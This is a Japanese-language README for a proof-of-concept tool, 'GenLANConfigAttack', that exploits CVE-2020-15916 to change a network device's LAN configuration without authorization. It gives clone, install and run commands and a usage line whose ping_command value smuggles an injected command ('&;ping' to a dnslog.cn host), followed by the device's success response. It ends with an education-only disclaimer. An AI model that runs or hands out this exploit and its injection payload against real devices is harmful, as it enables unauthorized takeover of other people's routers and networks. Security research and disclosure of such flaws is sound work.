
このプロジェクトは、デバイスのLAN設定への不正な変更を可能にする脆弱性CVE-2020-15916を悪用するためのPoCです。
GenLANConfigAttack は、デバイスのLAN設定への不正な変更を可能にする脆弱性 CVE-2020-15916 を悪用するためのPoCです。
git clone https://github.com/geniuszly/CVE-2020-15916
pip install -r requirements.txt
python GenLANConfigAttack.py
target_ip: ターゲットデバイスのIPアドレス。ping_command: ターゲットデバイス上で実行するコマンド。session_password: セッションアクセス用のパスワード。python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
[Response from 192.168.0.1]:
{"success":true,"message":"LAN IP configuration updated successfully"}
このPoCはCVE-2020-15916の脆弱性を対象としています。この脆弱性により、攻撃者は認証メカニズムの弱点を悪用して、脆弱なデバイスのLAN設定を変更できます。
このツールは教育目的のみで提供されています。責任を持って使用し、明示的な許可がある環境でのみ使用してください。